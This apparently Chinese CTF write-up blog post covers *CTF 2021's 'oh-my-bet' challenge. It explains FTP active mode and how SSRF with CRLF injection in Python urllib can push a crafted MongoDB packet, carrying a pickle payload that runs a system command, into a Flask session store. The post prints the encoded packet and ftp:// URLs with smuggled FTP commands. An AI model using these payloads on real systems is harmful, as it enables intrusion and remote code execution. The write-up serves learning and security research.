<!DOCTYPE html>
<html lang="en">

  <head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <meta name="keywords" content="" />
  <meta name="author" content="wk" />
  <meta name="description" content="" />
  
  
  <title>
    
      SSRF&amp;FTP主动模式 
      
      
      |
    
     wEik1&#39;blog
  </title>

  
    <link rel="apple-touch-icon" href="/images/avatar4.png">
    <link rel="icon" href="/images/avatar4.png">
  

  <!-- Raleway-Font -->
  <link href="https://fonts.googleapis.com/css?family=Raleway&display=swap" rel="stylesheet">

  <!-- hexo site css -->
  
<link rel="stylesheet" href="/css/base.css">
<link rel="stylesheet" href="/iconfont/iconfont.css">
<link rel="stylesheet" href="/css/github-markdown.css">
<link rel="stylesheet" href="/css/highlight.css">


  <!-- jquery3.3.1 -->
  <script src="https://cdn.bootcss.com/jquery/3.3.1/jquery.min.js"></script>

  <!-- fancybox -->
  <link href="https://cdn.bootcss.com/fancybox/3.5.2/jquery.fancybox.min.css" rel="stylesheet">
  <script async src="https://cdn.bootcss.com/fancybox/3.5.2/jquery.fancybox.min.js"></script>
  
<script src="/js/fancybox.js"></script>


  

<meta name="generator" content="Hexo 5.3.0"><link rel="alternate" href="/atom.xml" title="wEik1'blog" type="application/atom+xml">
</head>


  <body>
    <div id="app">
      <div class="header">
  <div class="avatar">
    <a href="/">
      <!-- 头像取消懒加载，添加no-lazy -->
      
        <img no-lazy src="/images/avatar4.png" alt="">
      
    </a>
    <div class="nickname"><a href="/">wEik1</a></div>
  </div>
  <div class="navbar">
    <ul>
      
        <li class="nav-item" data-path="/">
          <a href="/">Home</a>
        </li>
      
        <li class="nav-item" data-path="/archives/">
          <a href="/archives/">Archives</a>
        </li>
      
        <li class="nav-item" data-path="/categories/">
          <a href="/categories/">Categories</a>
        </li>
      
        <li class="nav-item" data-path="/tags/">
          <a href="/tags/">Tags</a>
        </li>
      
        <li class="nav-item" data-path="/about/">
          <a href="/about/">About</a>
        </li>
      
    </ul>
  </div>
</div>


<script src="/js/activeNav.js"></script>



      <div class="flex-container">
        <!-- 文章详情页，展示文章具体内容，url形式：https://yoursite/文章标题/ -->
<!-- 同时为「标签tag」，「朋友friend」，「分类categories」，「关于about」页面的承载页面，具体展示取决于page.type -->

<!-- LaTex Display -->
<script src="https://polyfill.io/v3/polyfill.min.js?features=es6"></script>
<script type="text/javascript" id="MathJax-script" async
  src="https://cdn.jsdelivr.net/npm/mathjax@3/es5/tex-chtml.js">
</script>
<script>
MathJax = {
  tex: {
    inlineMath: [['$', '$'], ['\\(', '\\)']]
  }
};
</script>



  

  

  

  
  <!-- 文章内容页 url形式：https://yoursite/文章标题/ -->
  <div class="container post-details" id="post-details">
    <div class="post-content">
      <div class="post-title">SSRF&FTP主动模式</div>
      <div class="post-attach">
        <span class="post-pubtime">
          <i class="iconfont icon-updatetime" title="Update time"></i>
          2021-01-21 14:45:44
        </span>
        
              <span class="post-categories">
                <i class="iconfont icon-bookmark" title="Categories"></i>
                
                <span class="span--category">
                  <a href="/categories/%E5%A5%87%E6%8A%80%E6%B7%AB%E5%B7%A7/" title="奇技淫巧">
                    <b>#</b> 奇技淫巧
                  </a>
                </span>
                
              </span>
          
              <span class="post-tags">
                <i class="iconfont icon-tags" title="Tags"></i>
                
                <span class="span--tag">
                  <a href="/tags/SSRF/" title="SSRF">
                    <b>#</b> SSRF
                  </a>
                </span>
                
                <span class="span--tag">
                  <a href="/tags/FTP/" title="FTP">
                    <b>#</b> FTP
                  </a>
                </span>
                
              </span>
          
      </div>
      <div class="markdown-body">
        <h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>上周 *CTF 2021 中碰一题很有意思的 web 题 oh-my-bet 这里记录一下思路。</p>
<p>题目是 flask 的并且存在 ssrf 漏洞，并且存在 CRLF 注入 CVE-2019-9740<br><a target="_blank" rel="noopener" href="https://bugs.python.org/issue36276">https://bugs.python.org/issue36276</a><br> 关键代码<br>    content = base64.b64encode(urllib.request.urlopen(path).read())</p>
<p>内网中存在 ftp 、mongodb、redis 服务，题目明确指出与redis 无关。</p>
<p>其中 flask 的session 是存在 mongodb的，而flask_session使用的serializer默认是pickle，也就是说只要能将恶意pickle数据塞到mongodb里就可以了就可以触发python反序列化执行任意命令。<br>类似于 P牛这篇文章 <a target="_blank" rel="noopener" href="https://www.leavesongs.com/PENETRATION/getshell-via-ssrf-and-redis.html">https://www.leavesongs.com/PENETRATION/getshell-via-ssrf-and-redis.html</a><br>不同的是本题是 mongodb<br>能直接通过 ssrf 向mangodb 写数据吗？搜了很久也没有搜到相关的文章。最后队里的一个师傅说可以通过 ftp 的主动模式去打 mongodb。</p>
<h2 id="ftp-的主动模式"><a href="#ftp-的主动模式" class="headerlink" title="ftp 的主动模式"></a>ftp 的主动模式</h2><p> 主动模式的FTP工作原理：客户端从一个任意的非特权端口N连接到FTP服务器的命令端口，也就是21端口。然后客 户端开始监听端口N+1，并发送FTP命令“port N+1”到FTP服务器。接着服务器会从它自己的数据端口（20）连接到客户端指定的数据端口（N+1）。</p>
<p> 简单的说就是客户端随意起一个大于1024端口去连服务器的21端口，然后发送ip 和端口告诉ftp服务器我已经准备好数据连接了，ftp服务器接收到消息后用自己的20端口去连接客户端并发送或者接收数据。<br> 所以在主动模式下我们可以让ftp去指定的ip端口下获取文件数据，将ftp服务器上的文件发送到指定ip端口。</p>
<p>抓包测试一下,使用主动模式连接 ftp 服务器，登入后输入命令 dir 查看目录<br><img src="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/SSRF%26FTP%E4%B8%BB%E5%8A%A8%E6%A8%A1%E5%BC%8F/600a39f1d29c916062000000.png"></p>
<p>数据包：<br><img src="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/SSRF%26FTP%E4%B8%BB%E5%8A%A8%E6%A8%A1%E5%BC%8F/600a3b78d29c916062000001.png"></p>
<p>第一部分为登入的流量</p>
<p>第二部分 客户端的 54003 端口向 ftp服务器 的21 端口发送命令 <code>PORT 192,168,138,1,211,84</code><br>告诉ftp服务器主动向我们指定的 ip 端口建立连接，这里ip端口的格式为Ip的四个部分以<code>,</code> 分割，端口则需要换算成这种格式 port/256, port - 向下取整(port/256)*256</p>
<pre><code>192,168,138,1,211,84 =&gt; 192.168.138.1:54100</code></pre>
<p>第三部分，客户端的54003端口向 ftp服务器的21端口发送 dir(LIST) 命令，ftp 服务器收到命令请求后将执行结果主动的发到前边制定的<code>192.168.138.1:54100</code></p>
<p>上传文件和下载文件也是一样的<br>上传文件 客户端向服务端发送 PORT 192,168,138,1,231,165 指定ip端口，接着发送上传文件的请求 <code>STOR /Users/weik1/Data/ftptest/1.txt</code> ,ftp 服务端收到命令后向 192,168,138,1,231,165 建立连接下载数据。 </p>
<pre><code>220 Microsoft FTP Service
USER wEik1
331 Password required
PASS password
230 User logged in.
PORT 192,168,138,1,231,165
200 PORT command successful.
STOR /Users/weik1/Data/ftptest/1.txt
550 The system cannot find the path specified. </code></pre>
<p><img src="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/SSRF%26FTP%E4%B8%BB%E5%8A%A8%E6%A8%A1%E5%BC%8F/600a3fe3d29c916062000003.png"></p>
<p>下载文件就是ftp 服务器将文件发送到客户端指定的ip端口。</p>
<h2 id="主动模式在-ssrf-中的利用"><a href="#主动模式在-ssrf-中的利用" class="headerlink" title="主动模式在 ssrf 中的利用"></a>主动模式在 ssrf 中的利用</h2><p>回到题目，需要利用 ftp 的主动模式去打 mongodb 向 mongodb 发起一个 update 请求，修改数据库里的 session 序列化数据。<br>我们将 mongodb 的 update 数据包上传到 ftp 服务器上，再利用ftp 服务器主动模式下载文件的机制将数据包发送到 mongodb 服务器指定的端口下。</p>
<p>找不到比赛的环境了构建一个简单的dome</p>
<pre><code>import sys
import urllib
import urllib.error
import urllib.request
try:
    info = urllib.request.urlopen(url).read()
    print(info)
except urllib.error.URLError as e:
    print(e)</code></pre>
<p>构造 mongodb 的 update 数据包</p>
<pre><code>HgEAAHoAAAAAAAAA3QcAAAAAAAABsQAAAGRvY3VtZW50cwCjAAAAB19pZABgAuHfVOiCa1hXwXICaWQALQAAAHNlc3Npb246MTcwYzA2MGUtYTI1OC00MzBkLTgzZDMtMjMxYTI3NDhiYzNwAAV2YWwAOgAAAACAA2Nwb3NpeApzeXN0ZW0KcQBYGgAAAC9yZWFkZmxhZyA+IC90bXAvYWFhYWFhYWFhcQGFcQJScQMuCWV4cGlyYXRpb24A/NHor3cBAAAAAFcAAAACaW5zZXJ0AAkAAABzZXNzaW9ucwAIb3JkZXJlZAABA2xzaWQAHgAAAAVpZAAQAAAABMuWVy4mw045rDMXu79vXg4AAiRkYgAGAAAAYWRtaW4AAA==</code></pre>
<p>用 nc 将 数据包挂在7777 端口<br><img src="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/SSRF%26FTP%E4%B8%BB%E5%8A%A8%E6%A8%A1%E5%BC%8F/600a76f4d29c916062000006.png"></p>
<p>利用ssrf + CRLF 注入 向ftp 服务器发送命令 </p>
<pre><code>TYPE A //数据类型为 ASCII码
PORT 192,168,138,1,30,97  /指定ip端口 192.168.138.129:7777
STOR session //将数据存储为文件 session</code></pre>
<p>具体的命令<br><img src="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/SSRF%26FTP%E4%B8%BB%E5%8A%A8%E6%A8%A1%E5%BC%8F/600aa66ed29c916062000007.png"></p>
<p>payload：<br>    <a href="ftp://wEik1:password\r\nTYPE">ftp://wEik1:password\r\nTYPE</a> A\r\nPORT 192,168,138,1,30,97\r\nSTOR <a href="mailto:&#x73;&#x65;&#x73;&#115;&#105;&#x6f;&#110;&#x40;&#x31;&#x39;&#50;&#46;&#x31;&#x36;&#x38;&#x2e;&#49;&#51;&#x38;&#46;&#x31;&#x32;&#57;">&#x73;&#x65;&#x73;&#115;&#105;&#x6f;&#110;&#x40;&#x31;&#x39;&#50;&#46;&#x31;&#x36;&#x38;&#x2e;&#49;&#51;&#x38;&#46;&#x31;&#x32;&#57;</a>/</p>
<p><img src="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/SSRF%26FTP%E4%B8%BB%E5%8A%A8%E6%A8%A1%E5%BC%8F/600aa7f7d29c916062000009.png"><br>数据包：<br><img src="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/SSRF%26FTP%E4%B8%BB%E5%8A%A8%E6%A8%A1%E5%BC%8F/600aa7e8d29c916062000008.png"></p>
<p>成功将文件上传到 ftp 服务器</p>
<p><img src="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/SSRF%26FTP%E4%B8%BB%E5%8A%A8%E6%A8%A1%E5%BC%8F/600aa840d29c91606200000a.png"></p>
<p>接着就是将ftp 服务器上的session 文件 发送到mongodb服务的端口上，这里因为没有环境，直接用nc 监听一下模拟一个mongodb服务。<br>继续监听 7777端口(懒的用别的端口了还得算)<br>向ftp 服务器发送命令 </p>
<pre><code>PORT 192,168,138,1,30,97  //指定ip端口 192.168.138.1:7777
RETR session  //发送session 文件也就是将session 文件内容发到 192.168.138.1 的7777端口</code></pre>
<p>payload:<br>    <a href="ftp://wEik1:password\r\nTYPE">ftp://wEik1:password\r\nTYPE</a> A\r\nPORT 192,168,138,1,30,97\r\nRETR <a href="mailto:&#115;&#x65;&#115;&#115;&#105;&#111;&#x6e;&#64;&#49;&#57;&#50;&#x2e;&#x31;&#x36;&#x38;&#46;&#49;&#x33;&#56;&#x2e;&#x31;&#x32;&#57;">&#115;&#x65;&#115;&#115;&#105;&#111;&#x6e;&#64;&#49;&#57;&#50;&#x2e;&#x31;&#x36;&#x38;&#46;&#49;&#x33;&#56;&#x2e;&#x31;&#x32;&#57;</a>/<br><img src="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/SSRF%26FTP%E4%B8%BB%E5%8A%A8%E6%A8%A1%E5%BC%8F/600aaa22d29c91606200000c.png"></p>
<p>数据包：<br><img src="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/SSRF%26FTP%E4%B8%BB%E5%8A%A8%E6%A8%A1%E5%BC%8F/600aaa69d29c91606200000d.png"></p>
<p>成功接收到数据<br><img src="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/SSRF%26FTP%E4%B8%BB%E5%8A%A8%E6%A8%A1%E5%BC%8F/600aaa15d29c91606200000b.png"></p>

      </div>
      
        <div class="prev-or-next">
          <div class="post-foot-next">
            
              <a href="/2021/01/18/CommonsBeanutils%E9%93%BE%E5%88%86%E6%9E%90/" target="_self">
                <i class="iconfont icon-chevronleft"></i>
                <span>Prev</span>
              </a>
            
          </div>
          <div class="post-attach">
            <span class="post-pubtime">
              <i class="iconfont icon-updatetime" title="Update time"></i>
              2021-01-21 14:45:44
            </span>
            
                  <span class="post-categories">
                    <i class="iconfont icon-bookmark" title="Categories"></i>
                    
                    <span class="span--category">
                      <a href="/categories/%E5%A5%87%E6%8A%80%E6%B7%AB%E5%B7%A7/" title="奇技淫巧">
                        <b>#</b> 奇技淫巧
                      </a>
                    </span>
                    
                  </span>
              
                  <span class="post-tags">
                    <i class="iconfont icon-tags" title="Tags"></i>
                    
                    <span class="span--tag">
                      <a href="/tags/SSRF/" title="SSRF">
                        <b>#</b> SSRF
                      </a>
                    </span>
                    
                    <span class="span--tag">
                      <a href="/tags/FTP/" title="FTP">
                        <b>#</b> FTP
                      </a>
                    </span>
                    
                  </span>
              
          </div>
          <div class="post-foot-prev">
            
              <a href="/2021/01/26/CommonCollections1%E9%93%BE%E5%88%86%E6%9E%90/" target="_self">
                <span>Next</span>
                <i class="iconfont icon-chevronright"></i>
              </a>
            
          </div>
        </div>
      
    </div>
    
  <div class="post-catalog" id="catalog">
    <div class="title">Contents</div>
    <div class="catalog-content">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-text">前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ftp-%E7%9A%84%E4%B8%BB%E5%8A%A8%E6%A8%A1%E5%BC%8F"><span class="toc-text">ftp 的主动模式</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%BB%E5%8A%A8%E6%A8%A1%E5%BC%8F%E5%9C%A8-ssrf-%E4%B8%AD%E7%9A%84%E5%88%A9%E7%94%A8"><span class="toc-text">主动模式在 ssrf 中的利用</span></a></li></ol>
    </div>
  </div>

  
<script src="/js/catalog.js"></script>




    
      <div class="comments-container">
        





      </div>
    
  </div>


        <div class="footer">
  <div class="social">
    <ul>
      
        <li>
          <a title="github" target="_blank" rel="noopener" href="https://github.com/Weik1">
            <i class="iconfont icon-github"></i>
          </a>
        </li>
      
        <li>
          <a title="email" href="1252820849@qq.com">
            <i class="iconfont icon-envelope"></i>
          </a>
        </li>
      
        <li>
          <a title="facebook" href="">
            <i class="iconfont icon-facebooksquare"></i>
          </a>
        </li>
      
        <li>
          <a title="twitter" href="">
            <i class="iconfont icon-twitter"></i>
          </a>
        </li>
      
        <li>
          <a title="wechat" href="">
            <i class="iconfont icon-wechat"></i>
          </a>
        </li>
      
        <li>
          <a title="weibo" href="">
            <i class="iconfont icon-weibo"></i>
          </a>
        </li>
      
        <li>
          <a title="rss" href="/atom.xml">
            <i class="iconfont icon-rss"></i>
          </a>
        </li>
      
    </ul>
  </div>
  
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Copyright © Oranges 2020</a>
        
    </div>
  
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Theme by Oranges | Powered by Hexo</a>
        
    </div>
  
</div>

      </div>

      <div class="back-to-top hidden">
  <a href="javascript: void(0)">
    <i class="iconfont icon-chevronup"></i>
  </a>
</div>


<script src="/js/backtotop.js"></script>



      
  <div class="search-icon" id="search-icon">
    <a href="javascript: void(0)">
      <i class="iconfont icon-search"></i>
    </a>
  </div>

  <div class="search-overlay hidden">
    <div class="search-content" tabindex="0">
      <div class="search-title">
        <span class="search-icon-input">
          <a href="javascript: void(0)">
            <i class="iconfont icon-search"></i>
          </a>
        </span>
        
          <input type="text" class="search-input" id="search-input" placeholder="Search...">
        
        <span class="search-close-icon" id="search-close-icon">
          <a href="javascript: void(0)">
            <i class="iconfont icon-close"></i>
          </a>
        </span>
      </div>
      <div class="search-result" id="search-result"></div>
    </div>
  </div>

  <script type="text/javascript">
    var inputArea = document.querySelector("#search-input")
    var searchOverlayArea = document.querySelector(".search-overlay")

    inputArea.onclick = function() {
      getSearchFile()
      this.onclick = null
    }

    inputArea.onkeydown = function() {
      if(event.keyCode == 13)
        return false
    }

    function openOrHideSearchContent() {
      let isHidden = searchOverlayArea.classList.contains('hidden')
      if (isHidden) {
        searchOverlayArea.classList.remove('hidden')
        document.body.classList.add('hidden')
        // inputArea.focus()
      } else {
        searchOverlayArea.classList.add('hidden')
        document.body.classList.remove('hidden')
      }
    }

    function blurSearchContent(e) {
      if (e.target === searchOverlayArea) {
        openOrHideSearchContent()
      }
    }

    document.querySelector("#search-icon").addEventListener("click", openOrHideSearchContent, false)
    document.querySelector("#search-close-icon").addEventListener("click", openOrHideSearchContent, false)
    searchOverlayArea.addEventListener("click", blurSearchContent, false)

    var searchFunc = function (path, search_id, content_id) {
      'use strict';
      var $input = document.getElementById(search_id);
      var $resultContent = document.getElementById(content_id);
      $resultContent.innerHTML = "<ul><span class='local-search-empty'>First search, index file loading, please wait...<span></ul>";
      $.ajax({
        // 0x01. load xml file
        url: path,
        dataType: "xml",
        success: function (xmlResponse) {
          // 0x02. parse xml file
          var datas = $("entry", xmlResponse).map(function () {
            return {
              title: $("title", this).text(),
              content: $("content", this).text(),
              url: $("url", this).text()
            };
          }).get();
          $resultContent.innerHTML = "";

          $input.addEventListener('input', function () {
            // 0x03. parse query to keywords list
            var str = '<ul class=\"search-result-list\">';
            var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
            $resultContent.innerHTML = "";
            if (this.value.trim().length <= 0) {
              return;
            }
            // 0x04. perform local searching
            datas.forEach(function (data) {
              var isMatch = true;
              var content_index = [];
              if (!data.title || data.title.trim() === '') {
                data.title = "Untitled";
              }
              var orig_data_title = data.title.trim();
              var data_title = orig_data_title.toLowerCase();
              var orig_data_content = data.content.trim().replace(/<[^>]+>/g, "");
              var data_content = orig_data_content.toLowerCase();
              var data_url = data.url;
              var index_title = -1;
              var index_content = -1;
              var first_occur = -1;
              // only match artiles with not empty contents
              if (data_content !== '') {
                keywords.forEach(function (keyword, i) {
                  index_title = data_title.indexOf(keyword);
                  index_content = data_content.indexOf(keyword);

                  if (index_title < 0 && index_content < 0) {
                    isMatch = false;
                  } else {
                    if (index_content < 0) {
                      index_content = 0;
                    }
                    if (i == 0) {
                      first_occur = index_content;
                    }
                    // content_index.push({index_content:index_content, keyword_len:keyword_len});
                  }
                });
              } else {
                isMatch = false;
              }
              // 0x05. show search results
              if (isMatch) {
                str += "<li><a href='" + data_url + "' class='search-result-title'>" + orig_data_title + "</a>";
                var content = orig_data_content;
                if (first_occur >= 0) {
                  // cut out 100 characters
                  var start = first_occur - 20;
                  var end = first_occur + 80;

                  if (start < 0) {
                    start = 0;
                  }

                  if (start == 0) {
                    end = 100;
                  }

                  if (end > content.length) {
                    end = content.length;
                  }

                  var match_content = content.substr(start, end);

                  // highlight all keywords
                  keywords.forEach(function (keyword) {
                    var regS = new RegExp(keyword, "gi");
                    match_content = match_content.replace(regS, "<span class=\"search-keyword\">" + keyword + "</span>");
                  });

                  str += "<p class=\"search-result-abstract\">" + match_content + "...</p>"
                }
                str += "</li>";
              }
            });
            str += "</ul>";
            if (str.indexOf('<li>') === -1) {
              return $resultContent.innerHTML = "<ul><span class='local-search-empty'>No result<span></ul>";
            }
            $resultContent.innerHTML = str;
          });
        },
        error: function(xhr, status, error) {
          $resultContent.innerHTML = ""
          if (xhr.status === 404) {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>The search.xml file was not found, please refer to：<a href='https://github.com/zchengsite/hexo-theme-oranges#configuration' target='_black'>configuration</a><span></ul>";
          } else {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>The request failed, Try to refresh the page or try again later.<span></ul>";
          }
        }
      });
      $(document).on('click', '#search-close-icon', function() {
        $('#search-input').val('');
        $('#search-result').html('');
      });
    }

    var getSearchFile = function() {
        var path = "/search.xml";
        searchFunc(path, 'search-input', 'search-result');
    }
  </script>




    </div>
  <script>
            window.imageLazyLoadSetting = {
                isSPA: false,
                processImages: null,
            };
        </script><script>window.addEventListener("load",function(){var t=/\.(gif|jpg|jpeg|tiff|png)$/i,r=/^data:image\/[a-z]+;base64,/;Array.prototype.slice.call(document.querySelectorAll("img[data-original]")).forEach(function(a){var e=a.parentNode;"A"===e.tagName&&(e.href.match(t)||e.href.match(r))&&(e.href=a.dataset.original)})});</script><script>!function(n){n.imageLazyLoadSetting.processImages=i;var e=n.imageLazyLoadSetting.isSPA,r=Array.prototype.slice.call(document.querySelectorAll("img[data-original]"));function i(){e&&(r=Array.prototype.slice.call(document.querySelectorAll("img[data-original]")));for(var t,a=0;a<r.length;a++)0<=(t=(t=r[a]).getBoundingClientRect()).bottom&&0<=t.left&&t.top<=(n.innerHeight||document.documentElement.clientHeight)&&function(){var t,e,n,i,o=r[a];t=o,e=function(){r=r.filter(function(t){return o!==t})},n=new Image,i=t.getAttribute("data-original"),n.onload=function(){t.src=i,e&&e()},n.src=i}()}i(),n.addEventListener("scroll",function(){var t,e;t=i,e=n,clearTimeout(t.tId),t.tId=setTimeout(function(){t.call(e)},500)})}(this);</script></body>
</html>
